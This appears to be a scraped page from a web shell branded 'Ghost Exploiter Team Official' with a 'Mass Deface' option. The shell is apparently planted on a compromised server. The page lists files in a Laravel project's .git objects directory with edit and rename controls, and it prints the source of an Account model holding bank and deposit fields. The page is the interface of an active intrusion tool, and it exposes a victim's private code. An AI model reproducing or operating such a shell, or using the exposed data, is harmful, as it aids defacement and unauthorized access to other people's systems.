Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.git
/
objects
/
8b
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.gitignore
0.01KB
edt
ren
Account.php
1.246KB
edt
ren
api.php
0KB
edt
ren
composer.json
1.513KB
edt
ren
contragents.php
0.699KB
edt
ren
d397dada57d9018f037cdd1
...
1.46KB
edt
ren
debugbar-20260128175340
...
13.946KB
edt
ren
debugbar.php
13.946KB
edt
ren
default.conf
0.759KB
edt
ren
index.html
0.435KB
edt
ren
index.php
0.457KB
edt
ren
packed-refs
0.548KB
edt
ren
<?php declare(strict_types=1); namespace App\Models; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\Relations\BelongsTo; use Illuminate\Support\Carbon; /** * @property int $id * @property int $model_id * @property string $name * @property int $organization_id * @property float $deposit * @property Carbon|null $created_at * @property Carbon|null $updated_at * * @property-read Organization $organization */ class Account extends Model { protected $table = 'accounts'; protected $fillable = [ 'model_id', 'external_id', 'name', 'organization_id', 'deposit', 'number', 'archived', 'added', 'cor_number', 'balance_of_the_date', 'bank_name', 'bank_bic', 'bank_city', 'organization_name', 'is_cash', 'current_balance' ]; /** * Связь с моделью Organization. */ public function organization(): BelongsTo { return $this->belongsTo(Organization::class, 'organization_id'); } public function payments() { return $this->HasMany(Payment::class); } public function bank() { return $this->belongsTo(Bank::class); } }
<=Back
Liking